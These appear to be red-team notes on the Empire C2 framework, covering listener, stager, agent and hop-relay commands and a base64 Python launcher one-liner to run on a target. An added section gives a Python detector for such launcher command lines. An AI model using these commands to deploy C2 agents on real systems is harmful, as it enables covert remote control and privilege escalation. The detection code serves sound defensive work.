# Empire C2

## Parts

* Listeners
* Stagers: generated payloads (for example a reverse shell) that act as the delivery mechanism for agents
* Agents
* Modules, used through agents
* Results are stored in a DB

## Commands

### uselistener

* Example

```sh
uselistener http
```

* Metasploit-like commands to configure and run the listener

```sh
set <option> <value>
options
execute
```

* Go back to the main menu

```sh
back
main
```

* Check `listeners`
* `kill <listener>`

### usestager

```sh
usestager multi/launcher
usestager multi/bash
```

* Set the listener created under `uselistener`

```sh
set Listener <Listener>
```

* `execute`, output is for example:

```sh
echo "import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('<Base64EncodedStager>'));" | python3 &
```

* Run this on the target

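Seen from the defending side, the launcher output above has a recognisable shape in process command-line logs: inline Python that passes a base64 blob to `exec()`, piped into the interpreter and backgrounded. The following detection sketch is an added example, not part of the original notes or of the Empire project; the function names `triage` and `scan` are hypothetical and the sample command lines are constructed, with a harmless payload.

```python
import base64
import hashlib
import re

# exec() of an inline base64 blob, the shape of the launcher output shown above.
LAUNCHER_RE = re.compile(
    r"exec\s*\(\s*base64\.b64decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)")
# Code piped into an interpreter instead of being run from a file on disk.
PIPED_RE = re.compile(r"\|\s*python[0-9.]*\b")

def triage(cmdline):
    """Return a finding for a launcher-style command line, else None.
    The payload is only decoded and hashed, never executed."""
    match = LAUNCHER_RE.search(cmdline)
    if match is None:
        return None
    try:
        payload = base64.b64decode(match.group(1), validate=True)
    except ValueError:  # malformed base64 still matches the launcher shape
        payload = b""
    return {
        "piped_to_python": bool(PIPED_RE.search(cmdline)),
        "warnings_suppressed": "filterwarnings('ignore')" in cmdline,
        "backgrounded": cmdline.rstrip().endswith("&"),
        "payload_bytes": len(payload),
        "payload_sha256": hashlib.sha256(payload).hexdigest(),
    }

def scan(cmdlines):
    """Triage every command line and keep only the findings."""
    return [f for f in map(triage, cmdlines) if f is not None]

# Constructed sample data: the payload is a harmless print statement.
SAMPLE_PAYLOAD = b"print('constructed sample')"
_B64 = base64.b64encode(SAMPLE_PAYLOAD).decode()
SAMPLE_CMDLINES = [
    'echo "import sys,base64,warnings;warnings.filterwarnings(\'ignore\');'
    f"exec(base64.b64decode('{_B64}'));\" | python3 &",
    "python3 -c \"import base64; print(base64.b64decode('aGVsbG8='))\"",
    "python3 manage.py runserver",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_CMDLINES):
        print(finding)
```

The payload hash gives a value to pivot on across hosts without ever running the decoded code.
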
### agents

* `agents` checks the deployed agents
* `interact <AgentName>`
* `help` in interaction context
* `kill <AgentName>`

## Create Hop Listener

```sh
uselistener http_hop
```

```sh
set RedirectListener <ExistingListenerName>
```

```sh
set Host <IPofRelay>
```

```sh
set Port <PortonRelay>
```

* `execute` and check files under `/tmp/http_hop/news.php`, `/tmp/http_hop/admin/get.php`, `/tmp/http_hop/login/process.php`

* `usestager multi/handler`
* `set Listener http_hop`
* On the relay: `php -S 0.0.0.0:PORT &>/dev/null &`

* For example, run `usemodule powershell/privesc/sherlock` on the agent

### Interactive shell